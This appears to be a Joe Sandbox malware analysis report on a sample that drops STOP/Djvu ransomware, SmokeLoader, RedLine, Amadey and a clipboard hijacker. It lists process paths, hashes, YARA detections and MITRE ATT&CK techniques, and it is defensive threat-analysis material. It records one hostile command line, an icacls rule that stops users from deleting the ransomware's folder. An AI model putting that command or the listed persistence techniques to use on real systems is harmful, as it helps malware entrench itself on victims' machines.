Imagebase:	0x400000
File size:	802304 bytes
MD5 hash:	6944FCA258A9009F9D3B7212CDB4874D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000002.442867169.0000000002690000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000002.442867169.0000000002690000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.442702951.00000000024A5000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Target ID:	7
Start time:	10:42:38
Start date:	28/05/2023
Path:	C:\Users\user\AppData\Local\Temp\C861.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\C861.exe
Imagebase:	0x400000
File size:	288768 bytes
MD5 hash:	7A8E3D000FBA0F5765B98E2D78EB9D12
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.460164953.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.460214856.0000000000838000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Target ID:	9
Start time:	10:42:39
Start date:	28/05/2023
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	icacls "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Imagebase:	0x310000
File size:	29696 bytes
MD5 hash:	FF0D1D4317A44C951240FAE75075D501
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	16
Start time:	10:42:41
Start date:	28/05/2023
Path:	C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe --Task
Imagebase:	0x400000
File size:	802304 bytes
MD5 hash:	6944FCA258A9009F9D3B7212CDB4874D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000002.619429561.0000000000891000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Target ID:	19
Start time:	10:42:42
Start date:	28/05/2023
Path:	C:\Users\user\AppData\Local\Temp\D804.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\D804.exe" --Admin IsNotAutoStart IsNotTask
Imagebase:	0x400000
File size:	802304 bytes
MD5 hash:	6944FCA258A9009F9D3B7212CDB4874D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Target ID:	20
Start time:	10:42:44
Start date:	28/05/2023
Path:	C:\Users\user\AppData\Local\Temp\3C54.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\3C54.exe
Imagebase:	0x4a0000
File size:	5129728 bytes
MD5 hash:	2AF03D52F9CF9E53DFFC1183B403E1B7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000002.507574434.0000000004050000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\3C54.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 70%, ReversingLabs
Reputation:	moderate

Target ID:	22
Start time:	10:42:47
Start date:	28/05/2023
Path:	C:\Users\user\AppData\Local\Temp\NewPlayer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\NewPlayer.exe"
Imagebase:	0x60000
File size:	255488 bytes
MD5 hash:	08240E71429B32855B418A4ACF0E38EC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000016.00000000.460937652.0000000000061000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000016.00000002.476037262.0000000000061000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\NewPlayer.exe, Author: Joe Security
Antivirus matches:	Detection: 88%, ReversingLabs

Target ID:	23
Start time:	10:42:49
Start date:	28/05/2023
Path:	C:\Users\user\AppData\Local\Temp\XandETC.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\XandETC.exe"
Imagebase:	0x7ff6a7fc0000
File size:	3890176 bytes
MD5 hash:	3006B49F3A30A80BB85074C279ACC7DF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 73%, ReversingLabs

Target ID:	25
Start time:	10:42:51
Start date:	28/05/2023
Path:	C:\Users\user\AppData\Local\Temp\B46F.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\B46F.exe
Imagebase:	0x400000
File size:	802304 bytes
MD5 hash:	6944FCA258A9009F9D3B7212CDB4874D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000019.00000002.473949878.0000000002434000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000019.00000002.474131384.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000019.00000002.474131384.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Target ID:	28
Start time:	10:42:52
Start date:	28/05/2023
Path:	C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe" --AutoStart
Imagebase:	0x400000
File size:	802304 bytes
MD5 hash:	6944FCA258A9009F9D3B7212CDB4874D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001C.00000002.488812684.000000000228A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001C.00000002.491035809.0000000002460000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001C.00000002.491035809.0000000002460000.00000040.00001000.00020000.00000000.sdmp, Author: unknown

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 01860199.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Threatname: Djvu

Threatname: SmokeLoader

Threatname: Vidar

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\02562567454920506534245398

C:\ProgramData\24693879337469440987379525

C:\ProgramData\39571994840354560723794613

C:\ProgramData\61788534741070885639801227

C:\ProgramData\68933564346194372112252072

C:\ProgramData\95239249759806897874806564

Windows Analysis Report
01860199.exe

Target ID:	37
Start time:	10:42:54
Start date:	28/05/2023
Path:	C:\Users\user\AppData\Local\Temp\913F.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\913F.exe
Imagebase:	0x400000
File size:	809984 bytes
MD5 hash:	15BC205C2CAF7196EE2267087C3B2BB8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000025.00000002.508274482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000025.00000002.508274482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000025.00000002.508274482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000025.00000002.508274482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

Target ID:	40
Start time:	10:42:56
Start date:	28/05/2023
Path:	C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Imagebase:	0x9b0000
File size:	9728 bytes
MD5 hash:	9EAD10C08E72AE41921191F8DB39BC16
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000028.00000002.618179009.00000000009B1000.00000020.00000001.01000000.0000001A.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000028.00000002.618179009.00000000009B1000.00000020.00000001.01000000.0000001A.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000028.00000000.480111248.00000000009B1000.00000020.00000001.01000000.0000001A.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000028.00000000.480111248.00000000009B1000.00000020.00000001.01000000.0000001A.sdmp, Author: unknown Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, Author: Joe Security Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, Author: unknown
Antivirus matches:	Detection: 88%, ReversingLabs

Target ID:	41
Start time:	10:42:57
Start date:	28/05/2023
Path:	C:\Users\user\AppData\Local\Temp\5DA0.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\5DA0.exe
Imagebase:	0x9a0000
File size:	5129728 bytes
MD5 hash:	2AF03D52F9CF9E53DFFC1183B403E1B7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\5DA0.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 70%, ReversingLabs

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Services
Platforms:	Windows
Url:	Open detailed description by Mitre